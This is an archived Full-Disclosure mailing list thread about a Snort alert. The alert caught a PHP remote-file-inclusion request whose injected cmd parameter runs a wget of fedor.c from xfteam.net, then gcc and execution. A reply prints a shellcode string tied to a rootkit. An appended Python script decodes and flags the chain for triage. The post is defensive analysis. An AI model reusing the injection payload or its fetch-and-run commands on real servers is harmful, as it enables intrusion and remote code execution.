lists.openwall.net - Open Source and information security mailing list archives
From: gml at phrick.net (gml)
Subject: http://xfteam.net/fedor.c - Anyone seen this before??

Actually, the closer I look at c4, I think it might just be sd's bindtty.c, which is part of suckit.

char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";

Dan wrote:
>Hi,
>Our Snort picked up an interesting attempt to download, compile and execute.
>Noting also the fact that the sub dir it's attempting to access has not been
>there for over 4 months (/logjam/)?
>
>Has anyone actually seen what this fedor.c is? I have done some googling but
>it comes up blank.
>
>Has anyone else noticed this kind of request recently?
>
>Is it just me or is xfteam.net not resolving anyway?
>
>Original HTTP request:
>GET /logjam/showhits.php?
>rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
>
>Breaking this down we get (twice):
>uname -a
>cd /tmp
>wget http://xfteam.net/fedor.c
>gcc -o f fedor.c
>./f
>
>
>Regards,
>Daniel.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
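The "breaking this down" step Dan did by hand, as an added triage script that is not part of the original thread: it percent-decodes the captured request path, pulls out the remote-include target in rel_path, splits each cmd= value on ';' into individual shell commands, and flags a download-then-compile-then-execute chain so the alert can be classified without running anything. The request string is the two quoted GET lines joined back together (assumed to be a faithful copy); the verb sets FETCH_VERBS and BUILD_VERBS are this example's own choice, not something from the post.

```python
"""Break a suspicious PHP remote-include request down into the shell commands
it tries to run.  Added example for the thread above, not code from the post.
"""
from urllib.parse import unquote

# Request path from the Snort alert quoted above (constructed copy of the two
# quoted GET lines, joined onto one line).
CAPTURED_PATH = (
    "/logjam/showhits.php?rel_path=http://xfteam.net/cmd.txt?"
    "&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f?"
    "&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f"
)

FETCH_VERBS = {"wget", "curl"}        # download stage (assumed verb list)
BUILD_VERBS = {"gcc", "cc", "make"}   # compile stage (assumed verb list)


def query_pairs(path):
    """Return (name, value) pairs from the query string, percent-decoded.

    Only '&' separates parameters; a literal '?' inside a value (the
    'cmd.txt?' trick) is kept so the include target survives intact.
    """
    if "?" not in path:
        return []
    query = path.split("?", 1)[1]
    pairs = []
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        pairs.append((name, unquote(value)))
    return pairs


def remote_includes(pairs):
    """Parameter values that point at an external URL: remote-file-inclusion candidates."""
    return [v for _, v in pairs if v.lower().startswith(("http://", "https://"))]


def command_chains(pairs, param="cmd"):
    """Split every '<param>=' value on ';' into its individual shell commands."""
    chains = []
    for name, value in pairs:
        if name != param:
            continue
        # A stray trailing '?' is separator glue left over from the injection,
        # not part of the command, so it is dropped.
        cmds = [c.strip().rstrip("?") for c in value.split(";")]
        chains.append([c for c in cmds if c])
    return chains


def fetched_urls(chain):
    """URLs handed to a download verb inside one command chain."""
    urls = []
    for cmd in chain:
        words = cmd.split()
        if words and words[0] in FETCH_VERBS:
            urls.extend(w for w in words[1:]
                        if w.startswith(("http://", "https://", "ftp://")))
    return urls


def is_download_compile_execute(chain):
    """True when a fetch verb, then a compiler, then './something' appear in that order."""
    stage = 0
    for cmd in chain:
        words = cmd.split()
        verb = words[0] if words else ""
        if stage == 0 and verb in FETCH_VERBS:
            stage = 1
        elif stage == 1 and verb in BUILD_VERBS:
            stage = 2
        elif stage == 2 and verb.startswith("./"):
            return True
    return False


def analyze(path):
    """Summarise one request path for triage."""
    pairs = query_pairs(path)
    chains = command_chains(pairs)
    return {
        "remote_includes": remote_includes(pairs),
        "chains": chains,
        "fetched_urls": sorted({u for ch in chains for u in fetched_urls(ch)}),
        "download_compile_execute": any(is_download_compile_execute(ch) for ch in chains),
    }


if __name__ == "__main__":
    report = analyze(CAPTURED_PATH)
    print("remote include target(s):", report["remote_includes"])
    for n, chain in enumerate(report["chains"], 1):
        print(f"cmd #{n}:")
        for cmd in chain:
            print("   ", cmd)
    print("fetched:", report["fetched_urls"])
    print("download/compile/execute chain:", report["download_compile_execute"])
```

Run against the captured path it reports the rel_path include target, the same five-command chain twice (matching Dan's "twice"), the single fetched URL, and a positive download/compile/execute verdict; the decoded commands and URLs are what you would hand to the network team for blocking and to the host owners for a /tmp check.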